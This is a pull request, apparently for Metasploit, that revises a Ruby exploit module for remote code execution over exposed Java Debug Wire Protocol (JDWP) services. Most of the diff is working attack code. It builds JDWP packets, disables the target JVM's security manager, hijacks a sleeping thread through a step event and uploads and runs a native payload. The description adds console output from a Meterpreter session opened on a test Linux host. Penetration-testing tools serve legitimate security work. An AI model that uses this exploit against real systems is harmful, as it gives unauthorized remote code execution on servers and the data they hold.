### PR TITLE
Add JDWP RCE for Windows and Linux

### DIFF
--- a/modules/exploits/multi/misc/java_jdwp_debugger.rb
+++ b/modules/exploits/multi/misc/java_jdwp_debugger.rb
@@ -442,7 +442,7 @@ class Metasploit3 < Msf::Exploit::Remote
   end
 
   # Force a network event for hitting breakpoint when object of debugging is a network app and break class is socket
-  def force_http_event
+  def force_net_event
     print_status("#{peer} - Forcing network event over #{datastore['BREAKPOINT_PORT']}")
 
     rex_socket = Rex::Socket::Tcp.create(
@@ -457,7 +457,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
     add_socket(rex_socket)
 
-    rex_socket.put("GET / HTTP/1.0\r\n\r\n")
+    rex_socket.put(rand_text_alphanumeric(4 + rand(4)))
 
     begin
       rex_socket.shutdown
@@ -813,7 +813,7 @@ class Metasploit3 < Msf::Exploit::Remote
     datastore['NUM_RETRIES'].times do |i|
       print_status("#{peer} - Waiting for breakpoint hit #{i} during #{secs} seconds...")
       if datastore['BREAKPOINT_PORT'] && datastore['BREAKPOINT_PORT'] > 0
-        force_http_event
+        force_net_event
       end
       buf = read_reply(secs)
       ret = parse_event_breakpoint(buf, r_id)

--- a/modules/exploits/multi/misc/java_jdwp_debugger.rb
+++ b/modules/exploits/multi/misc/java_jdwp_debugger.rb
@@ -31,6 +31,7 @@ class Metasploit3 < Msf::Exploit::Remote
   METHODS_SIG               = [2, 5]
   GETVALUES_SIG             = [2, 6]
   CLASSOBJECT_SIG           = [2, 11]
+  SETSTATICVALUES_SIG       = [3, 2]
   INVOKESTATICMETHOD_SIG    = [3, 3]
   CREATENEWINSTANCE_SIG     = [3, 4]
   REFERENCETYPE_SIG         = [9, 1]
@@ -388,6 +389,62 @@ class Metasploit3 < Msf::Exploit::Remote
     response = read_reply
     @methods[reftype_id] = parse_entries(response, formats)
   end
+
+  # Returns information for each field in a reference type (ie. object)
+  def get_fields(reftype_id)
+    formats = [
+            [@vars["fieldid_size"], "field_id"],
+            ["S", "name"],
+            ["S", "signature"],
+            ["I", "mod_bits"]
+    ]
+    ref_id = format(@vars["referencetypeid_size"],reftype_id)
+    sock.put(create_packet(FIELDS_SIG, ref_id))
+    response = read_reply
+    fields = parse_entries(response, formats)
+
+    fields
+  end
+
+  # Returns the value of one static field of the reference type. The field must be member of the reference type
+  # or one of its superclasses, superinterfaces, or implemented interfaces. Access control is not enforced;
+  # for example, the values of private fields can be obtained.
+  def get_value(reftype_id, field_id)
+    data = format(@vars["referencetypeid_size"],reftype_id)
+    data << [1].pack('N')
+    data << format(@vars["fieldid_size"],field_id)
+
+    sock.put(create_packet(GETVALUES_SIG, data))
+    response = read_reply
+    num_values = response.unpack('N')[0]
+
+    unless (num_values == 1) && (response[4].unpack('C')[0] == TAG_OBJECT)
+      fail_with(Failure::Unknown, "Bad response when getting value for field")
+    end
+
+    response.slice!(0..4)
+
+    len = @vars["objectid_size"]
+    value = unformat(len, response)
+
+    value
+  end
+
+  # Sets the value of one static field. Each field must be member of the class type or one of its superclasses,
+  # superinterfaces, or implemented interfaces. Access control is not enforced; for example, the values of
+  # private fields can be set. Final fields cannot be set.For primitive values, the value's type must match
+  # the field's type exactly. For object values, there must exist a widening reference conversion from the
+  # value's type to the field's type and the field's type must be loaded.
+  def set_value(reftype_id, field_id, value)
+    data = format(@vars["referencetypeid_size"],reftype_id)
+    data << [1].pack('N')
+    data << format(@vars["fieldid_size"],field_id)
+    data << format(@vars["objectid_size"],value)
+
+    sock.put(create_packet(SETSTATICVALUES_SIG, data))
+    read_reply
+  end
+
 
   # Checks if specified method is currently loaded by the target VM and returns it
   def get_method_by_name(classname, name, signature = nil)
@@ -784,6 +841,34 @@ class Metasploit3 < Msf::Exploit::Remote
     return r_id, t_id
   end
 
+  # Disables security manager if it's set on target JVM
+  def disable_sec_manager
+    sys_class = get_class_by_name("Ljava/lang/System;")
+
+    fields = get_fields(sys_class["reftype_id"])
+
+    sec_field = nil
+
+    fields.each do |field|
+      sec_field = field["field_id"] if field["name"].downcase == "security"
+    end
+
+    fail_with(Failure::Unknown, "Security attribute not found") if sec_field.nil?
+
+    value = get_value(sys_class["reftype_id"], sec_field)
+
+    if(value == 0)
+      print_good("#{peer} - Security manager was not set")
+    else
+      set_value(sys_class["reftype_id"], sec_field, 0)
+      if get_value(sys_class["reftype_id"], sec_field) == 0
+        print_good("#{peer} - Security manager has been disabled")
+      else
+        print_good("#{peer} - Security manager has not been disabled, trying anyway...")
+      end
+    end
+  end
+
   # Uploads & executes the payload on the target VM
   def exec_payload(thread_id)
     # 0. Fingerprinting OS
@@ -863,6 +948,9 @@ class Metasploit3 < Msf::Exploit::Remote
     vprint_status("#{peer} - Received matching event from thread #{t_id}")
     print_status("#{peer} - Deleting step event...")
     clear_event(EVENT_STEP, r_id)
+
+    print_status("#{peer} - Disabling security manager if set...")
+    disable_sec_manager
 
     print_status("#{peer} - Dropping and executing payload...")
     exec_payload(t_id)

--- a/modules/exploits/multi/misc/java_jdwp_debugger.rb
+++ b/modules/exploits/multi/misc/java_jdwp_debugger.rb
@@ -318,6 +318,10 @@ class Metasploit3 < Msf::Exploit::Remote
     "#{@vars["vm_name"]} - #{@vars["vm_version"]}"
   end
 
+  def is_java_eight
+    version.downcase =~ /1[.]8[.]/
+  end
+
   # Returns reference types for all classes currently loaded by the target VM
   def get_all_classes
     return unless @classes.empty?
@@ -624,8 +628,13 @@ class Metasploit3 < Msf::Exploit::Remote
   # Stores the payload on a new string created in target VM
   def upload_payload(thread_id, pl_exe)
     size = @vars["objectid_size"]
-    runtime_class , runtime_meth = get_class_and_method("Lsun/misc/BASE64Decoder;", "<init>")
-    buf = create_instance(runtime_class["reftype_id"], thread_id, runtime_meth["method_id"])
+    if is_java_eight
+      runtime_class , runtime_meth = get_class_and_method("Ljava/util/Base64;", "getDecoder")
+      buf = invoke_static(runtime_class["reftype_id"], thread_id, runtime_meth["method_id"])
+    else
+      runtime_class , runtime_meth = get_class_and_method("Lsun/misc/BASE64Decoder;", "<init>")
+      buf = create_instance(runtime_class["reftype_id"], thread_id, runtime_meth["method_id"])
+    end
     unless buf[0] == [TAG_OBJECT].pack('C')
       fail_with(Failure::UnexpectedReply, "Unexpected returned type: expected Object")
     end
@@ -644,7 +653,12 @@ class Metasploit3 < Msf::Exploit::Remote
     data = [TAG_OBJECT].pack('C')
     data << format(size, cmd_obj_id)
     data_array = [data]
-    runtime_class , runtime_meth = get_class_and_method("Lsun/misc/CharacterDecoder;", "decodeBuffer", "(Ljava/lang/String;)[B")
+
+    if is_java_eight
+      runtime_class , runtime_meth = get_class_and_method("Ljava/util/Base64$Decoder;", "decode", "(Ljava/lang/String;)[B")
+    else
+      runtime_class , runtime_meth = get_class_and_method("Lsun/misc/CharacterDecoder;", "decodeBuffer", "(Ljava/lang/String;)[B")
+    end
     buf = invoke(decoder, thread_id, runtime_class["reftype_id"], runtime_meth["method_id"], data_array)
     unless buf[0] == [TAG_ARRAY].pack('C')
       fail_with(Failure::UnexpectedReply, "Unexpected returned type: expected ByteArray")

--- a/modules/exploits/multi/misc/java_jdwp_debugger.rb
+++ b/modules/exploits/multi/misc/java_jdwp_debugger.rb
@@ -49,7 +49,9 @@ class Metasploit3 < Msf::Exploit::Remote
   MODKIND_THREADONLY        = 2
   MODKIND_CLASSMATCH        = 5
   MODKIND_LOCATIONONLY      = 7
+  MODKIND_STEP              = 10
   EVENT_BREAKPOINT          = 2
+  EVENT_STEP                = 1
   SUSPEND_EVENTTHREAD       = 1
   SUSPEND_ALL               = 2
   NOT_IMPLEMENTED           = 99
@@ -60,6 +62,10 @@ class Metasploit3 < Msf::Exploit::Remote
   TYPE_CLASS                = 1
   TAG_ARRAY                 = 91
   TAG_VOID                  = 86
+  TAG_THREAD                = 116
+  STEP_INTO                 = 0
+  STEP_MIN                  = 0
+  THREAD_SLEEPING_STATUS     = 2
 
 
   def initialize
@@ -322,6 +328,21 @@ class Metasploit3 < Msf::Exploit::Remote
     version.downcase =~ /1[.]8[.]/
   end
 
+  # Returns reference for all threads currently running on target VM
+  def get_all_threads
+    sock.put(create_packet(ALLTHREADS_SIG))
+    response = read_reply
+    num_threads = response.unpack('N').first
+    response.slice!(0..3)
+
+    size = @vars["objectid_size"]
+    num_threads.times do
+      t_id = unformat(size, response[0..size-1])
+      @threads[t_id] = nil
+      response.slice!(0..size-1)
+    end
+  end
+
   # Returns reference types for all classes currently loaded by the target VM
   def get_all_classes
     return unless @classes.empty?
@@ -416,20 +437,54 @@ class Metasploit3 < Msf::Exploit::Remote
     return classname, method
   end
 
-  # Resumes execution of the application after the suspend command or an event has stopped it
-  def resume_vm
-    sock.put(create_packet(RESUMEVM_SIG))
-    response = read_reply
+  # Gets the status of a given thread
+  def thread_status(thread_id)
+    sock.put(create_packet(THREADSTATUS_SIG, format(@vars["objectid_size"], thread_id)))
+    buf = read_reply(datastore['BREAK_TIMEOUT'])
+    unless buf
+      fail_with(Exploit::Failure::Unknown, "No network response")
+    end
+    status, suspend_status = buf.unpack('NN')
 
+    status
+  end
+
+  # Resumes execution of the application or thread after the suspend command or an event has stopped it
+  def resume_vm(thread_id = nil)
+    if thread_id.nil?
+      sock.put(create_packet(RESUMEVM_SIG))
+    else
+      sock.put(create_packet(THREADRESUME_SIG, format(@vars["objectid_size"], thread_id)))
+    end
+
+    response = read_reply(datastore['BREAK_TIMEOUT'])
     unless response
       fail_with(Exploit::Failure::Unknown, "No network response")
     end
+
+    response
+  end
+
+  # Suspend execution of the application or thread
+  def suspend_vm(thread_id = nil)
+    if thread_id.nil?
+      sock.put(create_packet(SUSPENDVM_SIG))
+    else
+      sock.put(create_packet(THREADSUSPEND_SIG, format(@vars["objectid_size"], thread_id)))
+    end
+
+    response = read_reply
+    unless response
+      fail_with(Exploit::Failure::Unknown, "No network response")
+    end
+
+    response
   end
 
   # Sets an event request. When the event described by this request occurs, an event is sent from the target VM
   def send_event(event_code, args)
     data = [event_code].pack('C')
-    data << [SUSPEND_ALL].pack('C')
+    data << [SUSPEND_EVENTTHREAD].pack('C')
     data << [args.length].pack('N')
 
     args.each do |kind,option|
@@ -473,15 +528,14 @@ class Metasploit3 < Msf::Exploit::Remote
   end
 
   # Parses a received event and compares it with the expected
-  def parse_event_breakpoint(buf, event_id)
-    r_id = buf[6..9].unpack('N')[0]
-
-    return nil unless event_id == r_id
-
+  def parse_event_breakpoint(buf, event_id, thread_id)
     len = @vars["objectid_size"]
+    return false if buf.length < 10 + len - 1
+
+    r_id = buf[6..9].unpack('N')[0]
     t_id = unformat(len,buf[10..10+len-1])
 
-    return r_id, t_id
+    return (event_id == r_id) && (thread_id == t_id)
   end
 
   # Clear a defined event request
@@ -729,38 +783,34 @@ class Metasploit3 < Msf::Exploit::Remote
     end
   end
 
-  # Sets a breakpoint on frequently called method (user-defined)
-  def set_breakpoint
-    vprint_status("#{peer} - Setting breakpoint on class: #{datastore['BREAKPOINT']}")
-
-    # 1. Gets reference of the method where breakpoint is going to be setted
-    classname, method = str_to_fq_class(datastore['BREAKPOINT'])
-    break_class = get_class_by_name(classname)
-    unless break_class
-      fail_with(Failure::NotFound, "Could not access #{datastore['BREAKPOINT']}, probably is not used by the application")
+  # Set event for stepping into a running thread
+  def set_step_event
+    # 1. Select a thread in sleeping status
+    t_id = nil
+    @threads.each_key do |thread|
+      if thread_status(thread) == THREAD_SLEEPING_STATUS
+        t_id = thread
+        break
+      end
     end
+    fail_with(Failure::Unknown, "Could not find a suitable thread for stepping") if t_id.nil?
 
-    get_methods(break_class["reftype_id"])
-    m = get_method_by_name(break_class["reftype_id"], method)
-    unless m
-      fail_with(Failure::BadConfig, "Method of Break Class not found")
-    end
+    # 2. Suspend the thread before setting the event
+    suspend_vm(t_id)
 
-    # 2. Sends event request for this method
-    loc = [TYPE_CLASS].pack('C')
-    loc << format(@vars["referencetypeid_size"], break_class["reftype_id"])
-    loc << format(@vars["methodid_size"], m["method_id"])
-    loc << [0,0].pack('NN')
+    vprint_status("#{peer} - Setting 'step into' event in thread: #{t_id}")
+    step_info = format(@vars["objectid_size"], t_id)
+    step_info << [STEP_MIN].pack('N')
+    step_info << [STEP_INTO].pack('N')
+    data = [[MODKIND_STEP, step_info]]
 
-    data = [[MODKIND_LOCATIONONLY, loc]]
-    r_id = send_event(EVENT_BREAKPOINT, data)
+    r_id = send_event(EVENT_STEP, data)
     unless r_id
-      fail_with(Failure::Unknown, "Could not set the breakpoint")
+      fail_with(Failure::Unknown, "Could not set the event")
     end
 
-    r_id
+    return r_id, t_id
   end
-
 
   # Uploads & executes the payload on the target VM
   def exec_payload(thread_id)
@@ -799,6 +849,7 @@ class Metasploit3 < Msf::Exploit::Remote
     @vars = {}
     @classes = []
     @methods = {}
+    @threads = {}
     @os = nil
 
     connect
@@ -807,7 +858,7 @@ class Metasploit3 < Msf::Exploit::Remote
       fail_with(Failure::NotVulnerable, "JDWP Protocol not found")
     end
 
-    print_status("#{peer} - Retriving the sizes of variable sized data types in the target VM...")
+    print_status("#{peer} - Retrieving the sizes of variable sized data types in the target VM...")
     get_sizes
 
     print_status("#{peer} - Getting the version of the target VM...")
@@ -816,36 +867,33 @@ class Metasploit3 < Msf::Exploit::Remote
     print_status("#{peer} - Getting all currently loaded classes by the target VM...")
     get_all_classes
 
-    print_status("#{peer} - Setting a breakpoint on #{datastore['BREAKPOINT']}...")
-    r_id = set_breakpoint
+    print_status("#{peer} - Getting all running threads in the target VM...")
+    get_all_threads
+
+    print_status("#{peer} - Setting 'step into' event...")
+    r_id, t_id = set_step_event
 
     print_status("#{peer} - Resuming VM and waiting for an event...")
-    resume_vm
+    response = resume_vm(t_id)
 
-    secs = datastore['BREAK_TIMEOUT']
-    ret = ""
-    datastore['NUM_RETRIES'].times do |i|
-      print_status("#{peer} - Waiting for breakpoint hit #{i} during #{secs} seconds...")
-      if datastore['BREAKPOINT_PORT'] && datastore['BREAKPOINT_PORT'] > 0
-        force_net_event
+    unless parse_event_breakpoint(response, r_id, t_id)
+      datastore['NUM_RETRIES'].times do |i|
+        print_status("#{peer} - Received #{i+1} responses that are not a 'step into' event...")
+        buf = read_reply
+        break if parse_event_breakpoint(buf, r_id, t_id)
+
+        if i == datastore['NUM_RETRIES']
+          fail_with(Failure::Unknown, "Event not received in #{datastore['NUM_RETRIES']} attempts")
+        end
       end
-      buf = read_reply(secs)
-      ret = parse_event_breakpoint(buf, r_id)
-      break unless ret.nil?
     end
 
-    r_id, t_id = ret
-
     vprint_status("#{peer} - Received matching event from thread #{t_id}")
-
-    print_status("#{peer} - Deleting breakpoint...")
-    clear_event(EVENT_BREAKPOINT, r_id)
+    print_status("#{peer} - Deleting step event...")
+    clear_event(EVENT_STEP, r_id)
 
     print_status("#{peer} - Dropping and executing payload...")
     exec_payload(t_id)
-
-    print_status("#{peer} - Resuming the target VM, just in case...")
-    resume_vm
 
     disconnect
   end

--- a/modules/exploits/multi/misc/java_jdwp_debugger.rb
+++ b/modules/exploits/multi/misc/java_jdwp_debugger.rb
@@ -78,6 +78,7 @@ class Metasploit3 < Msf::Exploit::Remote
       },
       'Author'         => [
         'prdelka', # Vulnerability discovery
+        'Michael Schierl', # First exploit seen
         'Christophe Alladoum', # JDWP Analysis and Exploit
         'Redsadic <julian.vilas[at]gmail.com>' # Metasploit Module
       ],
@@ -86,6 +87,7 @@ class Metasploit3 < Msf::Exploit::Remote
           ['OSVDB', '96066'],
           ['EDB', '27179'],
           ['URL', 'http://docs.oracle.com/javase/1.5.0/docs/guide/jpda/jdwp-spec.html'],
+          ['URL', 'https://github.com/schierlm/JavaPayload/blob/master/JavaPayload/src/javapayload/builder/JDWPInjector.java'],
           ['URL', 'http://www.exploit-db.com/papers/27179/'],
           ['URL', 'https://svn.nmap.org/nmap/scripts/jdwp-exec.nse'],
           ['URL', 'http://blog.ioactive.com/2014/04/hacking-java-debug-wire-protocol-or-how.html']
@@ -121,14 +123,11 @@ class Metasploit3 < Msf::Exploit::Remote
         Opt::RPORT(8000),
         OptInt.new('RESPONSE_TIMEOUT', [true, 'Number of seconds to wait for a server response', 10]),
         OptString.new('TMP_PATH', [ false, 'A directory where we can write files. Ensure there is a trailing slash']),
-        OptString.new('BREAKPOINT', [ true, 'Frequently called method for setting breakpoint', 'java.net.ServerSocket.accept' ]),
-        OptPort.new('BREAKPOINT_PORT', [ false, 'HTTP port to trigger breakpoint automatically (Ex. 8080 on tomcat)' ])
       ], self.class)
 
     register_advanced_options(
       [
         OptInt.new('NUM_RETRIES', [true, 'Number of retries when waiting for event', 10]),
-        OptInt.new('BREAK_TIMEOUT', [true, 'Number of seconds to wait for a breakpoint hit', 30])
       ], self.class)
   end
 
@@ -484,7 +483,7 @@ class Metasploit3 < Msf::Exploit::Remote
   # Sets an event request. When the event described by this request occurs, an event is sent from the target VM
   def send_event(event_code, args)
     data = [event_code].pack('C')
-    data << [SUSPEND_EVENTTHREAD].pack('C')
+    data << [SUSPEND_ALL].pack('C')
     data << [args.length].pack('N')
 
     args.each do |kind,option|
@@ -500,35 +499,8 @@ class Metasploit3 < Msf::Exploit::Remote
     return response.unpack('N')[0]
   end
 
-  # Force a network event for hitting breakpoint when object of debugging is a network app and break class is socket
-  def force_net_event
-    print_status("#{peer} - Forcing network event over #{datastore['BREAKPOINT_PORT']}")
-
-    rex_socket = Rex::Socket::Tcp.create(
-      'PeerHost' => rhost,
-      'PeerPort' => datastore['BREAKPOINT_PORT'],
-      'Context'  =>
-        {
-          'Msf'        => framework,
-          'MsfExploit' => self
-        }
-    )
-
-    add_socket(rex_socket)
-
-    rex_socket.put(rand_text_alphanumeric(4 + rand(4)))
-
-    begin
-      rex_socket.shutdown
-      rex_socket.close
-    rescue IOError
-    end
-
-    remove_socket(rex_socket)
-  end
-
   # Parses a received event and compares it with the expected
-  def parse_event_breakpoint(buf, event_id, thread_id)
+  def parse_event(buf, event_id, thread_id)
     len = @vars["objectid_size"]
     return false if buf.length < 10 + len - 1
 
@@ -795,8 +767,8 @@ class Metasploit3 < Msf::Exploit::Remote
     end
     fail_with(Failure::Unknown, "Could not find a suitable thread for stepping") if t_id.nil?
 
-    # 2. Suspend the thread before setting the event
-    suspend_vm(t_id)
+    # 2. Suspend the VM before setting the event
+    suspend_vm
 
     vprint_status("#{peer} - Setting 'step into' event in thread: #{t_id}")
     step_info = format(@vars["objectid_size"], t_id)
@@ -874,13 +846,13 @@ class Metasploit3 < Msf::Exploit::Remote
     r_id, t_id = set_step_event
 
     print_status("#{peer} - Resuming VM and waiting for an event...")
-    response = resume_vm(t_id)
+    response = resume_vm
 
-    unless parse_event_breakpoint(response, r_id, t_id)
+    unless parse_event(response, r_id, t_id)
       datastore['NUM_RETRIES'].times do |i|
         print_status("#{peer} - Received #{i+1} responses that are not a 'step into' event...")
         buf = read_reply
-        break if parse_event_breakpoint(buf, r_id, t_id)
+        break if parse_event(buf, r_id, t_id)
 
         if i == datastore['NUM_RETRIES']
           fail_with(Failure::Unknown, "Event not received in #{datastore['NUM_RETRIES']} attempts")


### PR DESCRIPTION
The module exploits Java Debugging Wire Protocol services on Windows and Linux systems.

Has been tested on Ubuntu 12.04 x86, with Apache Tomcat 6 & 7 and OpenJDK 1.7

```
[*] Started bind handler
[*] 172.16.218.161:8123 - Checking for Java Debugging Wire Protocol
[*] 172.16.218.161:8123 - Sending the handshake...
[*] 172.16.218.161:8123 - Parsing list of classes...
[*] 172.16.218.161:8123 - 2014-05-29 21:41:30 UTC - Parsed 1000 classes of 2526
[*] 172.16.218.161:8123 - 2014-05-29 21:41:32 UTC - Parsed 2000 classes of 2526
[*] 172.16.218.161:8123 - Setting breakpoint on class: java.net.ServerSocket.accept
[*] 172.16.218.161:8123 - Waiting for breakpoint hit 0 during 30 seconds...
[*] 172.16.218.161:8123 - Received matching event from thread 2527
[*] 172.16.218.161:8123 - Executing payload on "Linux", target version: OpenJDK Client VM - 1.7.0_09
[*] Transmitting intermediate stager for over-sized stage...(100 bytes)
[*] Sending stage (1228800 bytes) to 172.16.218.161
[*] Meterpreter session 1 opened (172.16.218.1:49249 -> 172.16.218.161:4444) at 2014-05-29 23:41:50 +0200
[+] Deleted /tmp/j3kaK

meterpreter > getuid 
Server username: uid=117, gid=126, euid=117, egid=126, suid=117, sgid=126
meterpreter > sysinfo 
Computer     : ubuntu
OS           : Linux ubuntu 3.2.0-35-generic-pae #55-Ubuntu SMP Wed Dec 5 18:04:39 UTC 2012 (i686)
Architecture : i686
Meterpreter  : x86/linux
```

```
msf exploit(java_jdwp_debugger) > show options

Module options (exploit/multi/misc/java_jdwp_debugger):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   RESPONSE_TIMEOUT  10               yes       Number of seconds to wait for a server response
   RHOST             172.16.218.160   yes       The target address
   RPORT             8123             yes       The target port
   STATUS_EVERY      1000             yes       How many iterations until status
   TMP_PATH          /tmp/            no        Overwrite the temp path for the file upload. Ensure there is a trailing slash
   VHOST                              no        HTTP server virtual host
```

```
msf exploit(java_jdwp_debugger) > show targets 

Exploit targets:

   Id  Name
   --  ----
   0   Windows x86 (Native Payload)
   1   Linux x86 (Native Payload)
```

```
   Name           : BREAK_CLASS
   Current Setting: java.net.ServerSocket.accept
   Description    : Frequently called method for setting breakpoint

   Name           : BREAK_TIMEOUT
   Current Setting: 30
   Description    : Number of seconds to wait for a breakpoint hit
...SNIP...
   Name           : NUM_RETRIES
   Current Setting: 10
   Description    : Number of retries when waiting for event
...SNIP...
```

By default, the breakpoint event necessary for getting an execution thread is set on "java.net.ServerSocket.accept". In this case is necessary to force some network traffic against the debugged application (if it's not receiving traffic by itself).

Working on:
-Add java platform support
-Give option to autogenerate network traffic for hitting the breakpoint -> send_request_cgi is not working as I expected while passing rport and rhost options, they're ignored (continues using target.host and target.port)
